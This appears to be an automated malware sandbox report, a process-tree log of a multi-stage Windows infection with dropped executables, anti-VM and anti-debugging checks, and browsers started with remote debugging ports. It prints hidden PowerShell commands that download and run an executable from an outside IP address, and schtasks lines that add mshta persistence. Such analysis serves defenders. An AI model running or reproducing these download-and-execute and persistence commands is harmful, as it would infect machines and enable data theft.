- Suspicious use of AdjustPrivilegeToken
PID:5104
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1088256021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1088256021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:2240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵PID:4292
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "pGQUgmadLV7" /tr "mshta \"C:\Temp\1xCtVa62r.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4476
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\1xCtVa62r.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3296 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4280
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088305001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1088305001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
PID:3608 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3656 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4888
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 8286⤵
- Program crash
PID:4460
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4596 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
PID:4704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 9566⤵
- Program crash
PID:2500
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"5⤵
- Executes dropped EXE
PID:4788
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 9686⤵
- Program crash
PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4408 -
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"6⤵
- Executes dropped EXE
PID:2608
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"6⤵
- Executes dropped EXE
PID:1528
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"6⤵
- Executes dropped EXE
PID:4456
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"6⤵
- Executes dropped EXE
PID:4812
-
-
C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 8206⤵
- Program crash
PID:3856
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008930101\e4519c4ed8.exe"C:\Users\Admin\AppData\Local\Temp\10008930101\e4519c4ed8.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5220
-
-
C:\Users\Admin\AppData\Local\Temp\10008940101\3f44de5325.exe"C:\Users\Admin\AppData\Local\Temp\10008940101\3f44de5325.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5748 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5136
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088323001\0f68b49190.exe"C:\Users\Admin\AppData\Local\Temp\1088323001\0f68b49190.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Users\Admin\AppData\Local\Temp\1088324001\4ddd11db3b.exe"C:\Users\Admin\AppData\Local\Temp\1088324001\4ddd11db3b.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 15124⤵
- Program crash
PID:3668
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088325001\8ca656b8af.exe"C:\Users\Admin\AppData\Local\Temp\1088325001\8ca656b8af.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3476 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:1420 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd28a5cc40,0x7ffd28a5cc4c,0x7ffd28a5cc585⤵PID:5860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2012,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:25⤵PID:4060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2252 /prefetch:35⤵PID:1380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2504 /prefetch:85⤵PID:5596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3184 /prefetch:15⤵
- Uses browser remote debugging
PID:4808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3228 /prefetch:15⤵
- Uses browser remote debugging
PID:1072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4524 /prefetch:15⤵
- Uses browser remote debugging
PID:5992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4628 /prefetch:85⤵PID:5248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:85⤵PID:5640
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2292
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 15164⤵
- Program crash
PID:5436
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088326001\05bc0d252e.exe"C:\Users\Admin\AppData\Local\Temp\1088326001\05bc0d252e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\1088327001\c550466aee.exe"C:\Users\Admin\AppData\Local\Temp\1088327001\c550466aee.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5064
-
-
C:\Users\Admin\AppData\Local\Temp\1088328001\0ffe1f7c77.exe"C:\Users\Admin\AppData\Local\Temp\1088328001\0ffe1f7c77.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3668
-
-
C:\Users\Admin\AppData\Local\Temp\1088329001\e14272126a.exe"C:\Users\Admin\AppData\Local\Temp\1088329001\e14272126a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1072 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4864 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd196ccc40,0x7ffd196ccc4c,0x7ffd196ccc585⤵PID:920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1828 /prefetch:25⤵PID:3768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2124,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2196 /prefetch:35⤵PID:1980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2440 /prefetch:85⤵PID:2292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:15⤵
- Uses browser remote debugging
PID:5056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:15⤵
- Uses browser remote debugging
PID:1692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:15⤵
- Uses browser remote debugging
PID:2812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4224 /prefetch:85⤵PID:1908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3636,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4844 /prefetch:85⤵PID:60
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4964,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4876 /prefetch:85⤵PID:5392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,11113629415742175485,15090648988756058194,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5076 /prefetch:85⤵PID:5500
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6112 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd196d46f8,0x7ffd196d4708,0x7ffd196d47185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:25⤵PID:5164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:35⤵PID:4460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2988 /prefetch:85⤵PID:4232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:15⤵
- Uses browser remote debugging
PID:5444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:15⤵
- Uses browser remote debugging
PID:5504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:15⤵
- Uses browser remote debugging
PID:5680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,16597981381088551312,6809309705617281309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:15⤵
- Uses browser remote debugging
PID:5692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088331001\e1c4702da7.exe"C:\Users\Admin\AppData\Local\Temp\1088331001\e1c4702da7.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 6QhiGmaZ3Bx /tr "mshta C:\Users\Admin\AppData\Local\Temp\HQFu7OFMI.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:5708 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 6QhiGmaZ3Bx /tr "mshta C:\Users\Admin\AppData\Local\Temp\HQFu7OFMI.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5868
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\HQFu7OFMI.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5716 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
